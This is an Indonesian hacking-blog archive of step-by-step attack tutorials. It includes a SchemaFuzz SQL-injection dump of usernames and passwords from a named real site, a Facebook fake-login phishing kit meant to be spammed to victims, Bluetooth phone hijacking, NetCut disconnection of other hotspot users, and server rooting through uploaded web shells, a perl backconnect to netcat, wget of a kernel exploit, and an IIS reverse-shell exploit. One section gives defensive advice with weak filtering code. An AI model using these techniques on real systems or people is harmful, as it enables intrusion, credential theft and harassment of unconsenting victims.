Jumat, 28 Januari 2011
Hacking Password IBM
Namun pembahasan kali ini lebih specifik untuk merek laptop IBM baik seri T, X, R, dan seri seri lain dari laptop IBM.
Mungkin sebagian kita pernah mengalami kelupaan saat memberikan password pada BIOS laptop, dan yang lebih parah lagi, password yang kita berikan tidak hanya pada level BIOS, tetapi pada level OS juga. Jadi kita tidak dapat Boot ke system tanpa melalui password.
Berikut ada;ah hal hal yang harus dipersiapkan untuk memulai meng-hack password IBM. Buatlah rangkaian seperti berikut:
Setelah rangkaian sudah dibuat, lalu hubungkan rangkaian dengan 3 buah kabel ke Chipset 24RF08. Perhatikan jangan sampai salah ya. SDA adalah kependekan dari Signal Data, SCL kependekan dari Signal Clock, dan GND singkatan dari Ground.
Perhatikan gambar berikut, car menghubungkan rangkaian pada kaki Chipset IBM anda.
Setelah rangkaian terhubung dengan Chipset 24RF08 pada laptop anda, lalu instal paket program 24RF08 pada laptop anda lalu instal paket program R24RF08 di komputer lain, misalnya komputer B.
Hubungkan rangkaian yang sudah di rakit ke serial port komputer B.
Scan passwordnya pada komputer target. Mohon bersabar ketika proses scaning password. Jika berhasil, pada software akan terlihat hasil dari password yang anda temukan beserta account-nya.
Selamat mencoba, semoga sukses ya...
Teknik Jebol Password BIOS Secara Software
2. Setelah selesai mendownload, jalankan softwarenya dengan mengetikan perintah cmospwd.exe di command prompt DOS.
3. Jika berhasil anda akan melihat tampilan Password BIOS, bisa dalam bentuk kode atau password asli BIOS anda, tergantung merek dan jenis BIOS anda.
Anda juga dapat menggunakan software pass.exe.
Setelah mendapatkan softwarenya, jalankan program dari command prompt DOS dengan mengetikan pass. Jika berhasil, BIOS anda akan di reset tanpa Password. Coba anda restart komputer, lali masuk ke menu BIOS dengan menekan tombol DEL, tergantung jenis BIOS anda, Jika berhasil anda akan masuk ke menu BIOS tanpa Password. Selamat Mencoba
Teknik Jebol Password BIOS Secara Hardware
2. Carilah Jumper BIOS, biasanya ada di dekat baterai BIOS dengan kode JP1, CLR_CMOS, JBAT dengan jumlah pin sebanyak 3 buah.
3. Dalam posisi normal, Jumper berada pada posisi pin 1 dan pin 2, untuk melakukan reset BIOS pindahkan jumper pada posisi 2 dan 3. Baca byku panduan Motherboard untuk mematikannya.
4. Setelah anda memindahkan jumper dalam posisi clear, tekanlah tombol Power beberapa kali untuk memastikan BIOS sudah di reset, jika tombol Power ditekan dan komputer hidup, berarti anda salah memindahkan posisi jumper.
5. Kembalikan BIOS pada posisi semula, yakni di pin 1 dan di pin2. Lalu coba hidupkan kembali komputer anda. Jika berhasil, cobalah anda masuk ke BIOS, anda akan bisa masuk ke BIOS tanpa Password
Kamis, 27 Januari 2011
Trik Blokir SMS
Pada saat ponsel standby ketik *35*1234*16# lalu tekan Ok/Yes/Call.
Untuk membatalkannya cukup ketik #35*1234*16# (perbedaannya terdapat pada karakter di depan angka 35.
Keterangan:
- Angka 35 merupakan kode Incoming Barring
- Angka 1234 merupakan kode Standar Call Barring
- Angka 16 merupakan kode untuk Sms
Selain kode di atas terdapat beberapa kode lain, diantaranya
- Angka 10 merupakan kode untuk All cellphone Service
- Angka 11 merupakan kode untuk Speech
- Angka 12 merupakan kode untuk Data
- Angka 13 merupakan kode untuk Fax
- Angka 18 merupakan kode untuk All data without Sms
- Angka 19 merupakan kode untuk All Service without Sms
- Angka 25 merupakan kode untuk All Syncrhonize Data
Selain untuk memblokir sms masuk anda pun dapat memblokir All cellphone Service, Speech, dan yang lainnya dengan kode di atas.
(PERHATIAN !!! UNTUK MEMBLOKIR NOMOR [INDOSAT], MASUKAN KODE *35*1234#, RESIKO DITANGAN ANDA, SAYA BELUM TAU CARA MEMBATALKAN PEMBLOKIRANNYA, trik ini berguna untuk menginsengi orang)
Hacking Hotspot Area
Salah satu cara untuk memiliki akses internet gratis yaitu dengan memanfaatkan layanan free hotspot yang sekarang banyak tersedia di tempat-tempat atau bangunan bangunan public/semi public, seperti di mal, cafe, kampus, perkantoran, dll. Bagi yang belum tahu apa itu hotspot dan bandwidth silahkan baca sendiri di wikipedia.org ya..!
Sesuia dengan judul dari postingan ini yaitu Hacking Hotspot Area dengan NetCut maka saya akan menunjukkan satu trik atau cara bagaimana manage atau menguasai bahkan iseng menjahili bandwidth dalam suatu area hotspot. Seperti yang mungkin sudah Anda tahu bahwa semakin banyak orang yang mengakses/menggunakan internet dalam suatu area hotspot maka akan semakin lambat pula kita dalam mendonwload, mengupload maupun membuka suatu halaman situs. Kenapa? karena jatah bandwidth akan dibagi kepada setiap orang yang mengakses internet dalam area hotspot tersebut.
Ada sebuah software yang dapat kita gunakan untuk mengontrol akses internet seseorang dalam suatu area hotspot. Nama software tersebut adalah netcut, dengan software netcut Anda akan punya otoritas untuk memutus akses internet orang lain yang ada dalam satu jaringan hotspot dgn Anda. Jadi Anda bisa bertindak selayaknya seorang server yang bisa menentukan siapa yang boleh dan tidak boleh mengakses internet dalam suatu area hotspot. Dengan begitu Anda bisa menguasai seluruh jatah bandwidth yang ada, sehingga Anda bisa lebih cepat membuka sebuah halaman situs serta mendonwload atau mengupload sebuah file di internet.
Software pengontrol bandwidth di hotspot
Penggunaan sofware ini sangat mudah, Anda tinggal donwload softwarenya , kemudian instal lau restart komputer Anda dan setelah itu jalankan softwarenya. Waktu softwarenya dijalankan maka secara otomatis software tersebut akan mendeteksi seluruh komputer yang sedang online dalam jaringan hotspot yang sedang Anda gunakan. Untuk memutus akses internet seseorang dalam jaringan hotspot tersebut, Anda tinggal pilih dan klik Cut Off. Kalau mau mematikan/memutus akses internet ke semua pengguna dalam area hotspot tersebut termasuk Anda, maka tinggal putuskan (Cut Off) GateWay IP nya yang ada di kolom sebelah kanan.
Kerennya lagi software ini bisa dipakai juga pada jaringan LAN, misalnya pada warnet - warnet, nah loe, bisa bisa pada pulang semua tu user kalo kita cut jaringannya. hehehehgz.
tapi ingat biasanya IP anda terletak di baris ke 2, so jangan cut tu baris baris yang di atas, gak tau ny ternyata IP anda ter-Cut sendiri, tapi gampang solusinya, silahkan restart wifi anda.
untuk softwarenya bisa di download DISINI
Seperti halnya sebuah penyakit, pada umumnya memiliki obat atau penangkalnya masing2. Begitu juga dengan netcut. Nama software penangkalnya sendiri tidak jauh-jauh dari nama penyakitnya, yaitu Anti Netcut.
Dengan menggunakan antinetcut, maka dijamin Anda akan terhindar dari orang-orang iseng yang menggunakan netcut untuk mengusai bandwidth atau sekedar ingin mengerjai user lainnya. Bahkan kita bisa mengetahui siapa yang sedang menggunakan/menjalankan netcut dalam jaringan tersebut.
Untuk Softwarenya bisa di download DI SINI
Sabtu, 22 Januari 2011
Bloger Hack
Dibawah ini merupakan Kumpulan tutorial singkat Blogspot dan beberapa Blogger Hack yang paling sering ditanyakan. Sengaja saya tidak membuat tulisan per-artikel mengingat penjelasannya terlalu singkat dan terbilang sederhana. Nah..untuk menjawab pertanyaan yang sama dan sering pada komentar dan Imel yang masuk saya kumpulkan aja jadi satu. Silahkan dicoba
Menghilangkan Navbar
Masuk halaman Edit HTML kemudian letakan dibawah kode
pic[1] = “PHOTO-URL“;
alt = new Array;
alt[0] = “My Photo”;
alt[1] = “My Photo”;
var now = new Date();
var seed = now.getTime() % 0xffffffff;
function rand(n) {
seed = (0x015a4e35 * seed) % 0x7fffffff;
return ( seed >> 16 ) % n;
}
var num = rand(2);
document.write(“http://www.blogger.com/profile/XXX‘>”);
Perhatikan pada kode yang ditandai dengan huruf tebal. Ganti PHOTO-URL dengan URL foto kamu sendiri, kemudian pada kode var num = rand(2);, angka 2 mewakili jumlah array yang kita buat. Pada contoh di atas berarti ada 2 array, 0 dan 1. Dan selanjutnya ganti kode XXX dengan 20 angka (untuk New Blogger) yang ada pada profil blogger kalian masing-masing.
Lupa password blogger?
Apa yang terjadi ketika login ke blogger namun lupa password blogger dan nama user? pasti kita akan panik setengah mati. padahal sudah berusaha mencoba berbagai katakunci namun hasilnya tetap saja nihil, ups sabar-sabar jangan panik pasti ada solusinya. pengen tau caranya lihat dibawah ini.
Cara mendapatkan kembali passoword dan user name di blogger:
1. Masuk aja ke http://www.blogger.com/forgot.g
2. Ada dua pilihan untuk mendapatkan kembali password dan username, disini saya hanya menjelaskan cara pertama yaitu menggunakan alamat url blogger/blogspot.
3. Langkah selanjutnya kita tinggal ikuti instruksi yang ada (karena menggunakan bahasa indonesia saya tidak menjelaskan caranya secara mendetail, saya yakin kalian semua pasti bisa)
Catatan: Informasi alamat url blog akan dikirim kealamat email (gmail), jika dalam beberapa waktu informasi tidak muncul dalam inbox, coba cek di folder spam. Nah pada email yang diterima kita akan melihat beberapa informasi penting, diantaranya jika kita lupa nama sandinya tinggal klik link dibawah kalimat “Apabila lupa sandi Anda, Anda dapat me-reset dengan meng-klik link ini:” kemudian akan muncul halaman bantuan password, masukan kode verifikasi sesuai dalam gambar, kemudian klik “dapatkan kembali password”. hal yang harus diperhatikan bahwa informasi password akan dikirim ke alamat email sekunder ketika pertama kali mendaftar.
Semoga bermanfaat, happy blogging
Hacking Database Dengan Schemafuzz
Udah pada tau khaan Schemafuzz apaan? klo belum, schemafuzz adalah tools yg di buat oleh Sauron dari darkc0de. Tools ini berfungsi utk SQL injection dan di buat menggunakan bahasa Python. Oke, langsung aja…
Utk pengguna windoss, install dlu interpreter python, coz bahasa ini gak ada default. Utk linux, langsung pake aja…
NOTE: UTK MEMPERBESAR GAMBAR, KLIK KANAN LALU PILIH “VIEW IMAGE”
1. Cari dlu web yg vul terhadap SQL injection. “Gimana cara-nya mas?” tenang, blum selesai. Oke, bug SQL injc biasa-nya terdapat pada halaman news,berita, atau sejenis nya. Utk mengetahui web tsb vul atau tidak, coba gunakan single quote (’) di akhir url. Contoh: http://target.com/news.php?id=2′ <<>
2. Target kita kali ini adalah www.rayner.com/products.php?id=22 . setelah kita mendapatkan target yang vulnerable, yang harus kita cari pertama kali adalah jumlah column
a. cari jumlah column dan magic number,..
command :
schemafuzz.py – -findcol -u
disitu dapat kita lihat bahwa jumlah column nya adalah 10 dimulai dari angka 0, dan yang null adalah column ke 1,..
3. cari database name,..
command :
schemafuzz.py – -dbs -u
disini link url nya kita copykan dari out put langkah diatas yaitu darkc0de url. Yang di blok adalah nama Database-nya.
setelah kita mendapat kan nama databasenya sekarang kita liat schema table dan colum yang ada dalam database tersebut,
4. lihat table dan column,
command :
schemafuzz.py – -schema -u
jangan lupa untuk menambahkan nama database nya di depan url dengan command -D namatadabase
hasil nya akan terlihat seperti ini,
digambar terlihat jelas semua nama table dan columnnya, langkah terakhir adalah melihat semua data yang ada dalam table dan column tersebut, disini kita akan melihat data yang ada dalam table auth dengan nama column name,pass (Table No. 1)
5. lihat data dalam collum!
command :
schemafuzz.py – -dump -u
jangan lupa didepan url kita tambahkan nama database, nama table, dan nama column, dengan command -D namadatabe -T namatable -C namacolumn. Contoh : # python schemafuzz.py –dump -u http://www.rayner.com/products.php?id=22+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5,6,7,8,9 -D db2889_rayner_en -T auth -C name,pass
Yang di block adalah username dan password ^^
Selesai… gunakan tools ini dng bijak yaa ^^
Jangan lupa baca juga artikel sebelumnya di: http://www.binushacker.net/sql-injection-dengan-schemafuzzy.html
Protecting Website From Common Attacks
Artikel ini akan berisi tentang empat jenis serangan web umum dan pencegahannya, yang digunakan
di sebagian besar jenis defacement. Lima eksploitasi umum yang saya cantumkan di bawah ini
adalah XSS, SQL injection, RFI dan LFI. Sebagian besar kesalahan terjadi pada pemrograman
yang memungkinkan attacker untuk dapat menyusup ke dalam website.
[2] Cross Site Scripting
Cross Site Scripting adalah jenis celah yang digunakan oleh attacker untuk menyuntikkan kode ke halaman
web yang rentan terhadap serangan ini. Jika sebuah situs rentan terhadap cross site scripting, attacker
kemungkinan besar akan mencoba untuk menyuntikkan situs dengan javascript berbahaya atau mencoba scam pengguna
dengan menciptakan bentuk halaman web yang hampir sama untuk mendapatkan informasi.
Example:
http://www.situs.net/find.php?all=”>
*Solusi (javascript) :
function RemoveBad(strTemp) {
strTemp = strTemp.replace(/\|\"|\'|\%|\;|\(|\)|\&|\+|\-/g,"");
return strTemp;
}
[3] SQL Injection
*\_ Login Form Bypassing
Berikut adalah contoh kode yang dapat kita bisa bypass:
index.html file:
login.php file:
Kita dapat bypass dengan menggunakan ‘ or ’1=1′, dan menjalankan “password = ”or ’1=1”;”.
Atau attacker dapat juga dapat menghapus database dengan menjalankan “‘ drop table database; –”.
*Solusi :
Menggunakan mysql_real_escape_string
Contoh:
*\_ Union SQL Injection
Union SQL injection adalah ketika pengguna menggunakan perintah UNION. Memeriksa celah dengan menambahkannya
di akhir url “sebuah php?.id=”. Jika terdapat error MySQL, situs tersebut kemungkinan besar
besar rentan terhadap UNION SQL Injection. Attacker melanjutkan menggunakan ORDER BY untuk menemukan kolom,
dan pada akhirnya, mereka menggunakan perintah UNION ALL SELECT.
Contoh :
http://www.situs.net/index.php?id=1′
salah satu contoh pesan error:
Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in…..
Setelah muncul pesan error,maka attacker melanjutkan aksinya )
http://www.situs.net/index.php?id=1 ORDER BY 1– <– No error.
http://www.situs.net/index.php?id=1 ORDER BY 2– <– Muncul pesan error. Ini berarti hanya ada satu kolom
http://www.situs.net/index.php?id=-1 UNION SELECT ALL version()– <– Memilih semua kolom dan menjalankan
perintah version().
*Solusi :
Tambahkan sesuatu seperti di bawah ini untuk mencegah SQL injection Union:
$bug = "(delete)|(update)|(union)|(insert)|(drop)|(http)|(--)|(/*)|(select)";
$patch = eregi_replace($bug, "", $patch);
[4] File Inclusion
\_ Remote File Inclusion dan Local File Inclusion
Remote File Inclusion adalah sebuah celah dimana situs mengizinkan attacker meng-includ file dari luar server.
Local File Inclusion adalah sebuah celah dalam situs dimana attacker dapat mengakses semua file di dalam server
dengan hanya melalui URL.
Contoh kode yang vulnerable :
Beberapa contoh serangan :
http://www.situs.net/page.php?page=../../../../../ etc/passwd < contoh LFI
http://www.situs.net/page.php?page=http://www.site.com/evilscript.txt? <>
*Solusi :
Validate the input.
$page = $_GET['page'];
$allowed = array('index.php', 'games.php' 'ip.php');
$iplogger = ('ip.php');
if (in_array $page, $pages)) {
include $page {
else
{
include $iplogger
die("IP logged.");
}
mirror :
http://www.exploit-db.com/papers/14577/
http://packetstormsecurity.org/papers/general/protecting-websites.txt
Akses Drive C: Yang DI Block
Pernahkah Anda perhatikan bahwa tidak semua komputer menonaktifkan akses untuk menuju direktori C:\ ??? Hal ini karena Citrix. Jika diizinkan Anda akan dapat mengambil program-program kantor ataupun kampus dan menyalinnya ke komputer di rumah Anda. Dan akses ke semua account mahasiswa atau pegawai lain.
Langsung saja …..
Iseng-iseng menjelajah, saya menemukan cara untuk mendapatkan akses ke direktori C:\ tanpa harus mengcrack apalagi menginstall program ini dan itu. Yang diperlukan hanyalah notepad.exe dan waktu satu menit. (Mungkin kurang).
1. Pertama buka notepad. Pastikan Anda menggunakan notepad Citrix, bukan notepad komputer Anda. (tapi Jika Anda sedang menggunakan komputer kantor atau kampus tak apa lah). Kemudian ketik ini (atau copy dan paste ini): start\ C:\ &end2\
2. Setelah Anda menulis script di atas kemudian simpanlah dengan nama DriveC.bat (atau Jika Anda ingin lebih cepat popup simpan dengan nama DriveC.cmd). Lalu tekan simpan. Dan selesai!
3. Silahkan anda buka Drive C:/ pada komputer tersebut, maka secara otomatis Drive C:/ juga tersimpan di MyDocument pada komputer tersebut.
Selamat mencoba….
Buka Kode Keamanan Untuk Segala Jenis HP
Nah, tools ini adalah sebuah aplikasi untuk Unlocking Nokia, Siemens, Vitel, Maxel, Panasonic, LG, AEG, Samsung, dan Motorola. Nih penjelasan detailnya”
WorldUnlock Kalkulator adalah sebuah aplikasi gratis untuk Nokia, Siemens, Vitel, Maxel, Panasonic, LG, AEG, Samsung, dan Motorola untuk membuka kode keamanan dan security lainnya.
Include MasterCode kalkulator yang dapat me-reset kode pengaman handphone.
Panduan:
1. Pilih model telepon dari daftar.
2. Masukkan nomor IMEI telepon Anda (Tekan * # 06 # pada telepon)
3· Pilih negara dan penyedia layanan di mana ponsel dibeli.
4· Tekan tombol: Calculate!
5· Nah selanjutnya muncul beberapa unlock codes.
6. 7 kode akan ditampilkan, gunakan kode pertama dimulai dari +7.
7· Jika belum bekerja, coba +1 dan yang terakhir +5.
8· Bila telepon menampilkan “Sim restriction off” itu berarti sudah tidak terkunci.
9· Jika hanya dua kode yang ditampilkan (+1 dan +2) masukkan code tersebut bersamaan!
Kode akan ditampilkan pada form: # pw + CODE + n #
Untuk memperoleh huruf: p, w atau +, tekan tombol * beberapa kali.
Masukkan kode dengan benar dengan menghapus semua simcard dari telepon, kemudian hidupkan telepon kembali dan kemudian masukkan kode.
Fitur “WorldUnlock Codes Calculator” adalah:
· Unlock Nokia
· Unlock LG
· Unlock Panasonic
· Unlock Maxon
· Unlock Samsung
· Unlock AEG/Telital
· Unlock Alcatel
· Unlock Siemens
· Unlock Sony
· Unlock Vitel
NOTE: XP/Vista/7 Is OK
DOWNLOAD
Hacking Bluetooth
Pertama kamu harus Download dulu softwarenya, passwordnya ada di sampingnya:
Download Tipe Satu – Bluetooth ( Password: http://lucifer-doom.blogspot.com/ )
Download Tipe Dua – Harus Register Dulu Klo Mo DL ( Password: www.dl4all.com )
Berikut ini contoh videonya:
Yang bisa di lakuin klo lu install software itu:
Bisa buka dan baca SMS
Bisa Buka Phone Book
Bisa Ganti Profile
Bisa Maenin RIngtone
Bisa Maenin MP3
Bisa Restart Dan Matiin HP
Bisa Ganti Volume
Bisa Ngeblock Phone
Bisa Pura2 Nelpon Dari HP
Dan lain lainnya ( Ampir semua fasilitas bisa )
Wkwkwkw.. Kan lumayan klo cuma mo iseng2in orang Lucunya klo di HP orang yang punya bluetooth itu ada yang simpen b*k*p.. Wkwkwkwkw.. Lucu abis dah, waktu itu gw ngakak, abis gw maenin film yang itu dari HP orang via bluetoothnya.. Orangnya ampe kaget kaget, mana di kampus lagi.. Hahaha.. ( *Jadi inget waktu itu.. Gyahahaha.. )
Instructions
1.) Klo device dah konek, gunakan 0000 sebagai codenya
2.) Bluetooth harus turned on, sebelum kamu jalanin BT application.
3.) Gunain Mozilla Untuk Download Softwarenya. ( Jangan lupa: File aslinya adalah *.jar )
Instalasi pake USB cable ( Sony Ericcson ):
1. Konekin HP ma Computernya.
2. Mount sebagai disk.
3. Drag (SuperBluetoothHack_v108.jar) ke /MSSEMC/Media files/other/ .
4. Disconnekin USB.
5. Lanjut ke Folder “Other” di HP loe.
6. Cari Aplikasinya, Trus “Install”.
Instalasi General ( Super Bluetooth Hack Version )
1. Download
2. Copy ke mobile
3. Jalanin Installernya ( incidentally need JAVA )
4. Klo itu semuanya ada, loe baru bisa jalanin itu software
5. Pilih bahasa dan silakan di configure
6. Click Connection
7. Click Search Devices
8. Pilih the “Victim”
9. And Manage <- Korban telah di victim..
Untuk yang lain juga gak jauh beda, masing masing HP ada kriterianya sendiri. Loe coba cobain dah satu satu klo gak bisa. Soalnya gw gak punya banyak tipe HP.. Wkwkwkwk..
Klo dah ke install, silakan cari mangsa bluetooth HP orang lain yang lagi aktif. Haha.. Jangan Lupa Bluetooth Loe Aktifin dolo sebelum menjalankan aplikasinya.. Oke.. Selamat mencoba.. Semoga kamu senang
Hacking Facebook Dengan Fake Login
Hack Facebook Dengan Fake Login? Kenapa Tidak…
Jangan lupa sediain Hosting / Free Hosting untuk naruh script yang mau kita buat fake login lokasinya nanti. Jangan sampe lupa, karena itu hal yang paling wajib dilakukan!
Oke lanjut, mantapin juga dah. Perhatikan Baik² Dan Lakukan Dengan Benar Menurut Petunjuk Dibawah Ini. Jangan Sampe Ada Kekeliruan Sedikitpun! Berikut ini adalah ulasannya:
1. Pertama, bikin dulu sebuah file di hosting tempat anda mau bikin fake login dengan filetype: html. Kemudian kasi nama: “index.html“, sehingga di contoh URL Web adalah: http://www.hostingloedisini.com/facebook/index.html
Bikin Code Sesuai Dengan Contoh Script Dibawah Ini:
Scriptcode pada no 1:
Klick Disini Untuk Lihat Scriptnya
2. Buat file logs.php di hostingan lo sendiri, contoh http://www.hostingloedisini.com/facebook/logs.php di bawah ini script nya.
Scriptcode pada no 2:
Klick Disini Untuk Lihat Scriptnya
3. Jangan lupa dan wajib untuk membuat file kosong yg berformat txt dengan nama: logs.txt – jadi URLnya jadi: http://www.hostingloedisini.com/facebook/logs.txt
4. Ini wajib dan harus diingat! Jangan lupa change mode semua filenya, sehingga permissionnya menjadi: 777 ( chmod + 777). Chmod 777 artinya dimana semua file dapat dibaca (r), dapat ditulis(w), dan dapat di eksekusi(x). Jadi chmod 777 adalah untuk merubah file agar file tersebut dapat di eksekusi oleh User, Groups & Other. Hasil set file permission 777 adalah (rwxrwxrwx) untuk Unix Server. Untuk masalah permission ini juga tergantung dari penyedia hosting, buat yang pake hosting gak nyediain change mode, langsung ajah dicoba tanpa memperhatikan poin ini & berdoa saja ini bisa berjalan.. Selain 777 explore permission bisa menjadi 775, 755 disesuaikan dengan server dan penyedia hosting anda.
5. Kemudian sebarkan URL yang telah loe buat, misal: “http://www.hostingloedisini.com/facebook/” dengan sesama user difacebook, iklan, atau spam lewat email sebanyak banyaknya. Bisa juga merajuk kepada cewe cewe / cowo cowo yang loe suka supaya klik tu login. Dijamin mantaf klo bisa dapetin username + loginnya!
6. Untuk melihat hasil login Username dan Passwordnya silakan buka file di logs.txt nya, nah klo ada username email beserta passwordnya. Brarti anda telah dapet login ntuh.
Contoh tampilan ujicoba aplikasi websitenya disini:
http://www.airdata.nl/libraries/tcpdf/config/lang/facebook/index.html
Selamat Mencoba, Semoga Berhasil..
Dan buat para Facebook’ers mania, oh ya, ni skalian gw kasi tips supaya hati hati & biar gak kna Fake Login:
1) Perhatikan dengan benar link address websitenya. Contoh klo FB linknya: http://www.facebook.com
2) Jangan pernah membuka link atau bahasa pemograman (CSS, XTML, XML, atau
HTML) yang aneh. Jika di klik, kemungkinan account kita akan memberikan
username dan password kita.
3) Pakailah virtual keyboard yang bisa diperoleh dengan mudah.
Untuk Windows tampilan XP, hanya cukup klik ’start’ -> All Programs ->
Accessories -> Accessibility -> ‘On-Screen Keyboard’
Untuk Windows tampilan bukan XP, hanya cukup klik ’start’ -> Program Files
-> Accessories -> Accessibility -> ‘On-Screen Keyboard’
4) Bila bermain di Warung Internet (Warnet), hindari check-list kotak
“Remember me” pada saat login, karena hal itu dapat menyimpan username
dan password di komputer tersebut. Kecuali memakai komputer pribadi.
Cara Nge-Root Target
Salam hangat untuk semuanya, banyak yang request bagaimana cara ngeroot target.
Apa sih tujuannya harus “ngeroot” atau mendapatkan akses root? Karena akses level “root” merupakan akses level tertinggi dalam UNIX, so dengan kita mendapatkan “root” maka anda bisa melakukan hal yang lebih banyak di server target.
Okelah klo begitu yuk kita mulai, beginilah cara ngeroot.
Langkah untuk ngeroot adalah:
- Sediakan server / pc untuk menjalankan Netcat
- Sediakan target yang sudah kita dapat dari (RFI/SHELLUPLOAD/LFI/DSB) yang safemode (OFF)
- Sedikan juga shell injection tools (c99, r57, dsb) yang didalamnya tersedia fasilitas untuk backconnect / gunakan perl backconnect tools
- Sediakan Netcat (NC) untuk menerima connection dari backconnect
- Sediakan local root exploit yang sesuai dengan kernel target
Oke, kita mulai beraksi
Asumsikan bahwa:
IPHOSTSERVER ANDA = 100.100.100.100
PORT SERVER NETCAT ANDA: 10000
Langkah pertama cara ngeroot:
Pastikan bahwa Netcat sudah terinstall & Anda sudah menjalankan Netcat pada Server Anda.
Commandnya sangat sederhana: netcat -n -l -v -p PORT
Contoh: netcat -n -l -v -p 10000
binushacker@ourbox:~$ nc -n -l -v -p 10000
Listening on [any] 10000 …
Langkah kedua cara ngeroot:
Pastikan bahwa anda sudah melakukan upload c99 / r57 ke server dimana didalamnya terdapat fasilitas backconnect. Jadi kita tinggal masukkan IP server kita,
Jika anda menggunakan perl backconnect tools, anda cukup ketikkan perintah: perl backconnectortools.txt IPHOSTSEVERANDA PORT
Contoh:
perl backconnect.txt 100.100.100.100 10000
Langkah ketiga cara ngeroot:
Tunggulan sampai ada connection dari server target ke server anda, biasanya akan muncul pesan bahwa terdapat koneksi ke server anda dari target.
Contoh:
binushacker@ourbox:~$ nc -n -l -v -p 10000
Listening on [any] 10000 …
Connect to [195.13.10.210] from localhost [127.0.0.1] 10000
Linux www.target.com 2.6.16 #1 SMP Fri Jun 01 17:19:41 EST NEW 2007 i686 i686 i386 GNU/Linux
uid=48(apache) gid=48(apache) groups=48(apache)
Langkah ke-empat cara ngeroot:
Anda sudah terkoneksi ke target, disinilah anda harus pandai-pandai menggunakan command Unix. Anda bisa belajar lebih dahulu command” Unix server.
Apabila sudah terkoneksi, maka persiapkanlah LOCAL EXPLOIT UNTUK KERNEL SERVER, ada banyak tools untuk local disesuaikan dengan kebutuhan.
Karena kernel target adalah 2.6.16, maka kita akan menggunakan 2.6.16 -> raptor, raptor2, h0llyshit, prctl untuk exploitnya.
Informasi mengenai local exploit untuk masing” kernel bisa dicari google, kalau kata ulil gamal gunakan jari jemari anda untuk menemukannya
Oke kita lanjut, setelah itu kita wget file raptor, kita tempatkan di yang permissionnya bisa execute. Kita cari saja yang 777 (misal: /var/tmp).
Kemudian kita jalankan perintahnya: ./raptor
w00t: uid=0(root) gid=0(root) groups=0(root)
whoami
uid=0(root) gid=0(root) groups=0(root)
Buzz, selamat anda sudah mendapatkan root.
Klo sudah dapat, dibagi bagi ya.
Hacking Dengan IIS
1) Pendahuluan
Pertama-tama sebelum melakukan, biar saya jelaskan kepada anda bahwa hacking atau deface menggunakan suatu exploit yang sudah ada di internet hanya akan menjadikan anda seorang lamer atau perusak. Anda seringkali mendapati orang-orang ini melakukan deface terhadap ratusan situs. Nah, mereka ini bukanlah hacker, melainkan script kiddies, karena mereka menggunakan code yang dibuat orang lain untuk mendeface situs. Hacker yang sejati adalah orang yang menciptakan code exploit dalam ‘0 day’. Dan saya sarankan kepada anda agar JANGAN PERNAH MENJADI SCRIPT KIDDIES untuk memperoleh sedikit ketenaran dan merasa bangga dengan hal tersebut!!!
2) Adanya Celah Keamanan
Ok cukup sudah !! Mari dimulai. Pertamakali tujuan kita untuk melakukan penetrasi adalah menemukan suatu hole. Webserver IIS berisikan banyak celah keamanan yang jika dieksploitasi dengan sesuai dapat memberikan seorang hacker kendali penuh atas sistem tersebut. Celah keamanan yang umum adalah buffer overflow, yakni mengeksploitasi format string. Apakah “Buffer Overflow” itu adalah soal yang lain dan memerlukan artikel tersendiri. Atau lebih baik silakan anda baca terbitan Phrack 49 (www.phrack.com) dengan judul “Smashing The Stack For Fun and Profit”. Disana istilah buffer overflow dijelaskan berdasarkan sudut pandang Linux.
Ok, karena webserver IIS menyimpan banyak celah keamanan eksploitasi buffer overflow. Hanya dalam 2 tahun terakhir ini e-eye digital defence team (http://www.eeye.com/) melaporkan adanya buffer overflow pada seluruh ekstensi ISAPI pada IIS Webserver.
Sebagai contoh suatu request http://www.iissite.com/a.idq?aaaaaaaaaaaaaaaaaa….aaaa
Sekarang, kapanpun webserver iis mendapatkan request berupa file seperti .idq atau .asp dsb selain .html request dipenuhi oleh file .dll yang spesifik pada webserver. Namun jika seorang hacker mengirimkan request berupa string panjang dari aaa dan mencari angka yang tepat dimana suatu buffer overflow terjadi, maka dia dapat menyesuaikan shell code ditempat tersebut dan menyebabkan shell codenya dieksekusi pada remote machine.
Catatan: Suatu shell code merupakan kode assembly yang memberikan command prompt pada Win 2000 dan shell jika pada Linux.
Tapi saat pertanyaan diajukan mengenai hacking website, kita memerlukan penemuan bug sebelumnya. Kaerna kebanyakan server yang dipatch untuk bug yang ditemukan sebelumnya. Pada dasarnya bug .idq ditemukan dua tahun terakhir tidak akan bekerja hari ini karena kebanyakan server Win 2000 telah dipatch dengan service pack sp3, sp4. Jadi saat ini yang kita perlukan adalah bug terakhir atau dalam dunia perhackingan dinamakan dengan “0day exploit”. Tempat terbaik untuk mencari exploit adalah www.packetstormsecurity.nl, situs ini secara konsisten memuat exploit, code, advisory yang terbaru. Tempat lainnya seperti www.k-otic.com/exploit atau cara terbaik adalah mencari dibagian 0day exploit pada situs kami www.hackersprogrammers.com. Sekarang ini sangat banyak 0day yang sengaja tidak pernah dipublikasikan!!! Dan hanya ditujukan untuk komunitas underground atau orang-orang tertentu yang dikenal sebagai hacker. Untuk mendapatkan exploit yang baik, anda perlu mengadakan kontak dengan hacker yang baik dan berbakat di internet. Dan pilihan terbaik adalah code yang anda buat sendiri (jika anda mampu) maka dengan ini anda mampu menghack berbagai webserver IIS di seluruh dunia!!! J
3) Mengeksploitasi celah keamanan dan Mengendalikan webserver
Ini bagian yang paling menarik. Compile code exploit anda dengan Visual C++ jika berupa kode win c atau gunakan gcc jika berupa kode linux. Jika anda tidak mengetahui hal ini, lebih baik mendownload exploit berbasis GUI dari internet (ini semakin menunjukkan bahwa anda seorang lamer). OK, sekarang sebagai contoh exploit webdave ntdll.dll yang ditemukan 3-4 bulan terakhir. Masih banyaknya server yang vulnerable untuk ini. Terakhir saat salya menuliskan artikel ini ditemukan bug terbaru berupa RPC DCOM oleh LSD. Namun bug RPC DCOM tidak akan bekerja dalam kasus ini karena firewall pada server akan memblok seluruh packet terhadap port 135. Setelah anda melihat-lihat webdave exploit, downloadlah exploit Kralor Webdave. Compile dan download exploit kralor yang berbasis GUI. Shellcode ini berupa jenis yang spesifik. Shellcode yang digunakan exploit Kralor memberikan suatu reverse shell. Artinya setelah berhasil mengeksploitasi server tersebut akan terhubung ke computer anda melalui suatu command shell!!! Jadi anda memerlukan netcat listener untuk ‘mendengar’ port spesifik pada computer anda. Download tool netcat dari internet dan masuk ke DOS prompt, ketik sebagai berikut:
D:\nc>nc -Lvp 6666
